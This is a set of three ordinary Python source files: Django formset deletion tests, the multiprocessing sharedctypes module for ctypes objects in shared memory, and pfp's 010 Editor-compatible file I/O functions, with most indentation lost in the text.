def add_fields(self, form, index):
super(BaseCustomDeleteFormSet, self).add_fields(form, index)
self.can_delete = True
if DELETION_FIELD_NAME in form.fields:
del form.fields[DELETION_FIELD_NAME]
def _should_delete_form(self, form):
return hasattr(form, 'should_delete') and form.should_delete()
class FormfieldShouldDeleteFormTests(TestCase):
"""
Regression for #14099: BaseModelFormSet should use ModelFormSet method _should_delete_form
"""
class BaseCustomDeleteModelFormSet(BaseModelFormSet, BaseCustomDeleteFormSet):
""" Model FormSet with CustomDelete MixIn """
class CustomDeleteUserForm(forms.ModelForm):
""" A model form with a 'should_delete' method """
class Meta:
model = User
fields = "__all__"
def should_delete(self):
""" delete form if odd PK """
return self.instance.pk % 2 != 0
NormalFormset = modelformset_factory(User, form=CustomDeleteUserForm, can_delete=True)
DeleteFormset = modelformset_factory(User, form=CustomDeleteUserForm, formset=BaseCustomDeleteModelFormSet)
data = {
'form-TOTAL_FORMS': '4',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '4',
'form-0-username': 'John',
'form-0-serial': '1',
'form-1-username': 'Paul',
'form-1-serial': '2',
'form-2-username': 'George',
'form-2-serial': '3',
'form-3-username': 'Ringo',
'form-3-serial': '5',
}
delete_all_ids = {
'form-0-DELETE': '1',
'form-1-DELETE': '1',
'form-2-DELETE': '1',
'form-3-DELETE': '1',
}
def test_init_database(self):
""" Add test data to database via formset """
formset = self.NormalFormset(self.data)
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 4)
def test_no_delete(self):
""" Verify base formset doesn't modify database """
# reload database
self.test_init_database()
# pass standard data dict & see none updated
data = dict(self.data)
data['form-INITIAL_FORMS'] = 4
data.update(dict(
('form-%d-id' % i, user.pk)
for i,user in enumerate(User.objects.all())
))
formset = self.NormalFormset(data, queryset=User.objects.all())
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 0)
self.assertEqual(len(User.objects.all()), 4)
def test_all_delete(self):
""" Verify base formset honors DELETE field """
# reload database
self.test_init_database()
# create data dict with all fields marked for deletion
data = dict(self.data)
data['form-INITIAL_FORMS'] = 4
data.update(dict(
('form-%d-id' % i, user.pk)
for i,user in enumerate(User.objects.all())
))
data.update(self.delete_all_ids)
formset = self.NormalFormset(data, queryset=User.objects.all())
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 0)
self.assertEqual(len(User.objects.all()), 0)
def test_custom_delete(self):
""" Verify DeleteFormset ignores DELETE field and uses form method """
# reload database
self.test_init_database()
# Create formset with custom Delete function
# create data dict with all fields marked for deletion
data = dict(self.data)
data['form-INITIAL_FORMS'] = 4
data.update(dict(
('form-%d-id' % i, user.pk)
for i,user in enumerate(User.objects.all())
))
data.update(self.delete_all_ids)
formset = self.DeleteFormset(data, queryset=User.objects.all())
# verify two were deleted
self.assertTrue(formset.is_valid())
self.assertEqual(len(formset.save()), 0)
self.assertEqual(len(User.objects.all()), 2)
# verify no "odd" PKs left
odd_ids = [user.pk for user in User.objects.all() if user.pk % 2]
self.assertEqual(len(odd_ids), 0)
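# ---------------------------------------------------------------------------
# Hedged sketch (not part of this test module): the approximate shape of the
# .models imported above, reconstructed from the POST data and assertions in
# the tests. Field names come from the tests themselves; field types, sizes,
# and options are assumptions.
#
#   from django.db import models
#
#   class User(models.Model):
#       username = models.CharField(max_length=16, unique=True)  # to_field target
#       serial = models.IntegerField()
#
#   class UserSite(models.Model):
#       user = models.ForeignKey(User, to_field='username')  # FK over a to_field (#10243)
#       data = models.IntegerField()
#
#   class Place(models.Model):                  # assumed base class; Restaurant is
#       name = models.CharField(max_length=50)  # exercised as an inherited model (#11120)
#
#   class Restaurant(Place):
#       pass
#
#   class Manager(models.Model):
#       restaurant = models.ForeignKey(Restaurant)
#       name = models.CharField(max_length=50)
#
#   class Network(models.Model):
#       name = models.CharField(max_length=15)
#
#   class Host(models.Model):
#       network = models.ForeignKey(Network)  # parent swapped by save_as_new (#14938)
#       hostname = models.CharField(max_length=25)
# ---------------------------------------------------------------------------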
|
|
#
# Module which supports allocation of ctypes objects from shared memory
#
# multiprocessing/sharedctypes.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
import ctypes
import weakref
from . import heap, RLock
from .forking import assert_spawning, ForkingPickler
__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized']
typecode_to_type = {
'c': ctypes.c_char, 'u': ctypes.c_wchar,
'b': ctypes.c_byte, 'B': ctypes.c_ubyte,
'h': ctypes.c_short, 'H': ctypes.c_ushort,
'i': ctypes.c_int, 'I': ctypes.c_uint,
'l': ctypes.c_long, 'L': ctypes.c_ulong,
'f': ctypes.c_float, 'd': ctypes.c_double
}
def _new_value(type_):
size = ctypes.sizeof(type_)
wrapper = heap.BufferWrapper(size)
return rebuild_ctype(type_, wrapper, None)
def RawValue(typecode_or_type, *args):
'''
Returns a ctypes object allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
obj.__init__(*args)
return obj
def RawArray(typecode_or_type, size_or_initializer):
'''
Returns a ctypes array allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
if isinstance(size_or_initializer, (int, long)):
type_ = type_ * size_or_initializer
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
return obj
else:
type_ = type_ * len(size_or_initializer)
result = _new_value(type_)
result.__init__(*size_or_initializer)
return result
def Value(typecode_or_type, *args, **kwds):
'''
Return a synchronization wrapper for a Value
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawValue(typecode_or_type, *args)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def Array(typecode_or_type, size_or_initializer, **kwds):
'''
Return a synchronization wrapper for a RawArray
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawArray(typecode_or_type, size_or_initializer)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def copy(obj):
new_obj = _new_value(type(obj))
ctypes.pointer(new_obj)[0] = obj
return new_obj
def synchronized(obj, lock=None):
assert not isinstance(obj, SynchronizedBase), 'object already synchronized'
if isinstance(obj, ctypes._SimpleCData):
return Synchronized(obj, lock)
elif isinstance(obj, ctypes.Array):
if obj._type_ is ctypes.c_char:
return SynchronizedString(obj, lock)
return SynchronizedArray(obj, lock)
else:
cls = type(obj)
try:
scls = class_cache[cls]
except KeyError:
names = [field[0] for field in cls._fields_]
d = dict((name, make_property(name)) for name in names)
classname = 'Synchronized' + cls.__name__
scls = class_cache[cls] = type(classname, (SynchronizedBase,), d)
return scls(obj, lock)
#
# Functions for pickling/unpickling
#
def reduce_ctype(obj):
assert_spawning(obj)
if isinstance(obj, ctypes.Array):
return rebuild_ctype, (obj._type_, obj._wrapper, obj._length_)
else:
return rebuild_ctype, (type(obj), obj._wrapper, None)
def rebuild_ctype(type_, wrapper, length):
if length is not None:
type_ = type_ * length
ForkingPickler.register(type_, reduce_ctype)
obj = type_.from_address(wrapper.get_address())
obj._wrapper = wrapper
return obj
#
# Function to create properties
#
def make_property(name):
try:
return prop_cache[name]
except KeyError:
d = {}
exec(template % ((name, ) * 7), d)
prop_cache[name] = d[name]
return d[name]
template = '''
def get%s(self):
self.acquire()
try:
return self._obj.%s
finally:
self.release()
def set%s(self, value):
self.acquire()
try:
self._obj.%s = value
finally:
self.release()
%s = property(get%s, set%s)
'''
prop_cache = {}
class_cache = weakref.WeakKeyDictionary()
#
# Synchronized wrappers
#
class SynchronizedBase(object):
def __init__(self, obj, lock=None):
self._obj = obj
self._lock = lock or RLock()
self.acquire = self._lock.acquire
self.release = self._lock.release
def __reduce__(self):
assert_spawning(self)
return synchronized, (self._obj, self._lock)
def get_obj(self):
return self._obj
def get_lock(self):
return self._lock
def __repr__(self):
return '<%s wrapper for %s>' % (type(self).__name__, self._obj)
class Synchronized(SynchronizedBase):
value = make_property('value')
class SynchronizedArray(SynchronizedBase):
def __len__(self):
return len(self._obj)
def __getitem__(self, i):
self.acquire()
try:
return self._obj[i]
finally:
self.release()
def __setitem__(self, i, value):
self.acquire()
try:
self._obj[i] = value
finally:
self.release()
def __getslice__(self, start, stop):
self.acquire()
try:
return self._obj[start:stop]
finally:
self.release()
def __setslice__(self, start, stop, values):
self.acquire()
try:
self._obj[start:stop] = values
finally:
self.release()
class SynchronizedString(SynchronizedArray):
value = make_property('value')
raw = make_property('raw')
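# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): typical use of
# Value()/Array() and of synchronized() on a ctypes Structure. It imports the
# standard library's multiprocessing.sharedctypes, which exposes the same API
# as this module; the Point structure and the values are illustrative
# assumptions. In real code these objects are created before forking/spawning
# and shared with child processes.
# ---------------------------------------------------------------------------
def _example_shared_ctypes():
    import ctypes
    from multiprocessing.sharedctypes import Array, RawValue, Value, synchronized

    class Point(ctypes.Structure):
        _fields_ = [('x', ctypes.c_double), ('y', ctypes.c_double)]

    counter = Value('i', 0)          # Synchronized wrapper around a shared c_int
    samples = Array('d', [0.0] * 4)  # SynchronizedArray of shared c_double

    with counter.get_lock():         # the wrapper exposes the RLock guarding the object
        counter.value += 1
    samples[0] = 3.14                # item access acquires/releases the lock internally

    # For a Structure, synchronized() builds a Synchronized<Name> class on the
    # fly with one property per field -- this is what make_property() and the
    # exec'd template above produce.
    pt = synchronized(RawValue(Point, 1.0, 2.0))
    return counter.value, list(samples), (pt.x, pt.y)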
|
|
#!/usr/bin/env python
# encoding: utf-8
"""
This module of native functions is implemented for
compatibility with 010 Editor functions. Some of these functions
are no-ops, while others are fully implemented.
"""
import six
import sys
from pfp.native import native
import pfp.fields
from pfp.fields import PYVAL
import pfp.errors as errors
import pfp.bitwrap as bitwrap
# http://www.sweetscape.com/010editor/manual/FuncIO.htm
# void BigEndian()
@native(name="BigEndian", ret=pfp.fields.Void)
def BigEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
pfp.fields.NumberBase.endian = pfp.fields.BIG_ENDIAN
# void BitfieldDisablePadding()
@native(name="BitfieldDisablePadding", ret=pfp.fields.Void, send_interp=True)
def BitfieldDisablePadding(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_padded(False)
# void BitfieldEnablePadding()
@native(name="BitfieldEnablePadding", ret=pfp.fields.Void, send_interp=True)
def BitfieldEnablePadding(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_padded(True)
# void BitfieldLeftToRight()
@native(name="BitfieldLeftToRight", ret=pfp.fields.Void, send_interp=True)
def BitfieldLeftToRight(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_direction(interp.BITFIELD_DIR_LEFT_RIGHT)
# void BitfieldRightToLeft()
@native(name="BitfieldRightToLeft", ret=pfp.fields.Void, send_interp=True)
def BitfieldRightToLeft(params, ctxt, scope, stream, coord, interp):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
interp.set_bitfield_direction(interp.BITFIELD_DIR_RIGHT_LEFT)
# double ConvertBytesToDouble( uchar byteArray[] )
@native(name="ConvertBytesToDouble", ret=pfp.fields.Double)
def ConvertBytesToDouble(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# float ConvertBytesToFloat( uchar byteArray[] )
@native(name="ConvertBytesToFloat", ret=pfp.fields.Float)
def ConvertBytesToFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# hfloat ConvertBytesToHFloat( uchar byteArray[] )
@native(name="ConvertBytesToHFloat", ret=pfp.fields.Float)
def ConvertBytesToHFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int ConvertDataToBytes( data_type value, uchar byteArray[] )
@native(name="ConvertDataToBytes", ret=pfp.fields.Int)
def ConvertDataToBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void DeleteBytes( int64 start, int64 size )
@native(name="DeleteBytes", ret=pfp.fields.Void)
def DeleteBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int DirectoryExists( string dir )
@native(name="DirectoryExists", ret=pfp.fields.Int)
def DirectoryExists(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int FEof()
@native(name="FEof", ret=pfp.fields.Int)
def FEof(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
# now that streams are _ALL_ BitwrappedStreams, we can use BitwrappedStream-specific
# functions
if stream.is_eof():
return 1
else:
return 0
# int64 FileSize()
@native(name="FileSize", ret=pfp.fields.Int64)
def FileSize(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
return stream.size()
# TFileList FindFiles( string dir, string filter )
@native(name="FindFiles", ret=pfp.fields.Void)
def FindFiles(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int FPrintf( int fileNum, char format[], ... )
@native(name="FPrintf", ret=pfp.fields.Int)
def FPrintf(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int FSeek( int64 pos )
@native(name="FSeek", ret=pfp.fields.Int)
def FSeek(params, ctxt, scope, stream, coord):
"""Returns 0 if successful or -1 if the address is out of range
"""
if len(params) != 1:
raise errors.InvalidArguments(
            coord,
            "1 argument (pos)",
            "{} args".format(len(params)),
)
pos = PYVAL(params[0])
curr_pos = stream.tell()
fsize = stream.size()
if pos > fsize:
stream.seek(fsize)
return -1
elif pos < 0:
stream.seek(0)
return -1
diff = pos - curr_pos
if diff < 0:
stream.seek(pos)
return 0
data = stream.read(diff)
# let the ctxt automatically append numbers, as needed, unless the previous
# child was also a skipped field
skipped_name = "_skipped"
if len(ctxt._pfp__children) > 0 and ctxt._pfp__children[
-1
]._pfp__name.startswith("_skipped"):
old_name = ctxt._pfp__children[-1]._pfp__name
data = ctxt._pfp__children[-1].raw_data + data
skipped_name = old_name
ctxt._pfp__children = ctxt._pfp__children[:-1]
del ctxt._pfp__children_map[old_name]
tmp_stream = bitwrap.BitwrappedStream(six.BytesIO(data))
new_field = pfp.fields.Array(len(data), pfp.fields.Char, tmp_stream)
ctxt._pfp__add_child(skipped_name, new_field, stream)
scope.add_var(skipped_name, new_field)
return 0
# int FSkip( int64 offset )
@native(name="FSkip", ret=pfp.fields.Int)
def FSkip(params, ctxt, scope, stream, coord):
"""Returns 0 if successful or -1 if the address is out of range
"""
if len(params) != 1:
raise errors.InvalidArguments(
            coord,
            "1 argument (offset)",
            "{} args".format(len(params)),
)
skip_amt = PYVAL(params[0])
pos = skip_amt + stream.tell()
return FSeek([pos], ctxt, scope, stream, coord)
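# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): what FSeek()/FSkip()
# do when a template jumps forward. The pfp.parse() keyword names follow the
# pfp documentation but should be treated as an assumption here; the template
# and data are made up for illustration.
# ---------------------------------------------------------------------------
def _example_fskip_skipped_bytes():
    import pfp  # imported lazily so this sketch does not affect module import

    dom = pfp.parse(
        data=b"AAAABBBB",
        template="""
            FSkip(4);     // jump over the first four bytes
            char tag[4];  // parses "BBBB"
        """,
    )
    # Besides ``tag``, the parsed DOM also contains a char array named
    # "_skipped" holding the four bytes that were jumped over (see the FSeek
    # implementation above).
    return dom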
# int64 FTell()
@native(name="FTell", ret=pfp.fields.Int64)
def FTell(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
return stream.tell()
# void InsertBytes( int64 start, int64 size, uchar value=0 )
@native(name="InsertBytes", ret=pfp.fields.Void)
def InsertBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int IsBigEndian()
@native(name="IsBigEndian", ret=pfp.fields.Int)
def IsBigEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
if pfp.fields.NumberBase.endian == pfp.fields.BIG_ENDIAN:
return 1
else:
return 0
# int IsLittleEndian()
@native(name="IsLittleEndian", ret=pfp.fields.Int)
def IsLittleEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
    if pfp.fields.NumberBase.endian == pfp.fields.LITTLE_ENDIAN:
        return 1
    else:
        return 0
# void LittleEndian()
@native(name="LittleEndian", ret=pfp.fields.Void)
def LittleEndian(params, ctxt, scope, stream, coord):
if len(params) > 0:
raise errors.InvalidArguments(
coord, "0 arguments", "{} args".format(len(params))
)
pfp.fields.NumberBase.endian = pfp.fields.LITTLE_ENDIAN
# int MakeDir( string dir )
@native(name="MakeDir", ret=pfp.fields.Int)
def MakeDir(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void OverwriteBytes( int64 start, int64 size, uchar value=0 )
@native(name="OverwriteBytes", ret=pfp.fields.Void)
def OverwriteBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
def _read_data(params, stream, cls, coord):
bits = stream._bits
curr_pos = stream.tell()
if len(params) == 1:
pos = PYVAL(params[0])
stream.seek(pos, 0)
elif len(params) > 1:
raise errors.InvalidArguments(
coord, "at most 1 arguments", "{} args".format(len(params))
)
res = cls(stream=stream)
# reset the stream
stream.seek(curr_pos, 0)
stream._bits = bits
return res
# char ReadByte( int64 pos=FTell() )
@native(name="ReadByte", ret=pfp.fields.Char)
def ReadByte(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Char, coord)
# double ReadDouble( int64 pos=FTell() )
@native(name="ReadDouble", ret=pfp.fields.Double)
def ReadDouble(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Double, coord)
# float ReadFloat( int64 pos=FTell() )
@native(name="ReadFloat", ret=pfp.fields.Float)
def ReadFloat(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Float, coord)
# hfloat ReadHFloat( int64 pos=FTell() )
@native(name="ReadHFloat", ret=pfp.fields.Float)
def ReadHFloat(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Float, coord)
# int ReadInt( int64 pos=FTell() )
@native(name="ReadInt", ret=pfp.fields.Int)
def ReadInt(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Int, coord)
# int64 ReadInt64( int64 pos=FTell() )
@native(name="ReadInt64", ret=pfp.fields.Int64)
def ReadInt64(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Int64, coord)
# int64 ReadQuad( int64 pos=FTell() )
@native(name="ReadQuad", ret=pfp.fields.Int64)
def ReadQuad(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Int64, coord)
# short ReadShort( int64 pos=FTell() )
@native(name="ReadShort", ret=pfp.fields.Short)
def ReadShort(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.Short, coord)
# uchar ReadUByte( int64 pos=FTell() )
@native(name="ReadUByte", ret=pfp.fields.UChar)
def ReadUByte(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UChar, coord)
# uint ReadUInt( int64 pos=FTell() )
@native(name="ReadUInt", ret=pfp.fields.UInt)
def ReadUInt(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UInt, coord)
# uint64 ReadUInt64( int64 pos=FTell() )
@native(name="ReadUInt64", ret=pfp.fields.UInt64)
def ReadUInt64(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UInt64, coord)
# uint64 ReadUQuad( int64 pos=FTell() )
@native(name="ReadUQuad", ret=pfp.fields.UInt64)
def ReadUQuad(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UInt64, coord)
# ushort ReadUShort( int64 pos=FTell() )
@native(name="ReadUShort", ret=pfp.fields.UShort)
def ReadUShort(params, ctxt, scope, stream, coord):
return _read_data(params, stream, pfp.fields.UShort, coord)
# char[] ReadLine( int64 pos, int maxLen=-1, int includeLinefeeds=true )
@native(name="ReadLine", ret=pfp.fields.String)
def ReadLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void ReadBytes( uchar buffer[], int64 pos, int n )
@native(name="ReadBytes", ret=pfp.fields.Void)
def ReadBytes(params, ctxt, scope, stream, coord):
    """Copy ``n`` bytes starting at ``pos`` into ``buffer`` without moving
    the file pointer.
    """
    if len(params) != 3:
        raise errors.InvalidArguments(
            coord,
            "3 arguments (buffer, pos, n)",
            "{} args".format(len(params)),
        )

    if not isinstance(params[0], pfp.fields.Array):
        raise errors.InvalidArguments(
            coord, "buffer must be an array", params[0].__class__.__name__
        )
    if params[0].field_cls not in [pfp.fields.UChar, pfp.fields.Char]:
        raise errors.InvalidArguments(
            coord,
            "buffer must be an array of uchar or char",
            params[0].field_cls.__name__,
        )

    if not isinstance(params[1], pfp.fields.IntBase):
        raise errors.InvalidArguments(
            coord, "pos must be an integer", params[1].__class__.__name__
        )
    if not isinstance(params[2], pfp.fields.IntBase):
        raise errors.InvalidArguments(
            coord, "n must be an integer", params[2].__class__.__name__
        )

    bits = stream._bits
    curr_pos = stream.tell()

    # seek to the requested position before reading; the prototype is
    # ReadBytes(buffer, pos, n), so ``pos`` (params[1]) is the start offset
    stream.seek(PYVAL(params[1]), 0)

    vals = [
        params[0].field_cls(stream) for x in six.moves.range(PYVAL(params[2]))
    ]

    # restore the original position and bit offset so the call does not
    # advance the file pointer
    stream.seek(curr_pos, 0)
    stream._bits = bits

    params[0]._pfp__set_value(vals)
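# Hedged usage sketch (illustration only): ReadBytes fills an existing char or
# uchar array with n bytes without moving the file pointer, e.g. in a template:
#
#   local uchar magic[4];
#   ReadBytes(magic, 0, 4);    // copy the first four bytes into magic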
# char[] ReadString( int64 pos, int maxLen=-1 )
@native(name="ReadString", ret=pfp.fields.String)
def ReadString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int ReadStringLength( int64 pos, int maxLen=-1 )
@native(name="ReadStringLength", ret=pfp.fields.Int)
def ReadStringLength(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# wstring ReadWLine( int64 pos, int maxLen=-1 )
@native(name="ReadWLine", ret=pfp.fields.WString)
def ReadWLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# wstring ReadWString( int64 pos, int maxLen=-1 )
@native(name="ReadWString", ret=pfp.fields.WString)
def ReadWString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int ReadWStringLength( int64 pos, int maxLen=-1 )
@native(name="ReadWStringLength", ret=pfp.fields.Int)
def ReadWStringLength(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextAddressToLine( int64 address )
@native(name="TextAddressToLine", ret=pfp.fields.Int64)
def TextAddressToLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextAddressToColumn( int64 address )
@native(name="TextAddressToColumn", ret=pfp.fields.Int)
def TextAddressToColumn(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextColumnToAddress( int64 line, int column )
@native(name="TextColumnToAddress", ret=pfp.fields.Int64)
def TextColumnToAddress(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextGetNumLines()
@native(name="TextGetNumLines", ret=pfp.fields.Int64)
def TextGetNumLines(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextGetLineSize( int64 line, int includeLinefeeds=true )
@native(name="TextGetLineSize", ret=pfp.fields.Int)
def TextGetLineSize(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int64 TextLineToAddress( int64 line )
@native(name="TextLineToAddress", ret=pfp.fields.Int64)
def TextLineToAddress(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextReadLine( char buffer[], int64 line, int maxsize, int includeLinefeeds=true )
@native(name="TextReadLine", ret=pfp.fields.Int)
def TextReadLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# int TextReadLineW( wchar_t buffer[], int64 line, int maxsize, int includeLinefeeds=true )
@native(name="TextReadLineW", ret=pfp.fields.Int)
def TextReadLineW(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void TextWriteLine( const char buffer[], int64 line, int includeLinefeeds=true )
@native(name="TextWriteLine", ret=pfp.fields.Void)
def TextWriteLine(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void TextWriteLineW( const wchar_t buffer[], int64 line, int includeLinefeeds=true )
@native(name="TextWriteLineW", ret=pfp.fields.Void)
def TextWriteLineW(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteByte( int64 pos, char value )
@native(name="WriteByte", ret=pfp.fields.Void)
def WriteByte(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteDouble( int64 pos, double value )
@native(name="WriteDouble", ret=pfp.fields.Void)
def WriteDouble(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteFloat( int64 pos, float value )
@native(name="WriteFloat", ret=pfp.fields.Void)
def WriteFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteHFloat( int64 pos, float value )
@native(name="WriteHFloat", ret=pfp.fields.Void)
def WriteHFloat(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteInt( int64 pos, int value )
@native(name="WriteInt", ret=pfp.fields.Void)
def WriteInt(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteInt64( int64 pos, int64 value )
@native(name="WriteInt64", ret=pfp.fields.Void)
def WriteInt64(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteQuad( int64 pos, int64 value )
@native(name="WriteQuad", ret=pfp.fields.Void)
def WriteQuad(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteShort( int64 pos, short value )
@native(name="WriteShort", ret=pfp.fields.Void)
def WriteShort(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUByte( int64 pos, uchar value )
@native(name="WriteUByte", ret=pfp.fields.Void)
def WriteUByte(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUInt( int64 pos, uint value )
@native(name="WriteUInt", ret=pfp.fields.Void)
def WriteUInt(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUInt64( int64 pos, uint64 value )
@native(name="WriteUInt64", ret=pfp.fields.Void)
def WriteUInt64(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUQuad( int64 pos, uint64 value )
@native(name="WriteUQuad", ret=pfp.fields.Void)
def WriteUQuad(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteUShort( int64 pos, ushort value )
@native(name="WriteUShort", ret=pfp.fields.Void)
def WriteUShort(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteBytes( const uchar buffer[], int64 pos, int n )
@native(name="WriteBytes", ret=pfp.fields.Void)
def WriteBytes(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteString( int64 pos, const char value[] )
@native(name="WriteString", ret=pfp.fields.Void)
def WriteString(params, ctxt, scope, stream, coord):
raise NotImplementedError()
# void WriteWString( int64 pos, const wstring value )
@native(name="WriteWString", ret=pfp.fields.Void)
def WriteWString(params, ctxt, scope, stream, coord):
raise NotImplementedError()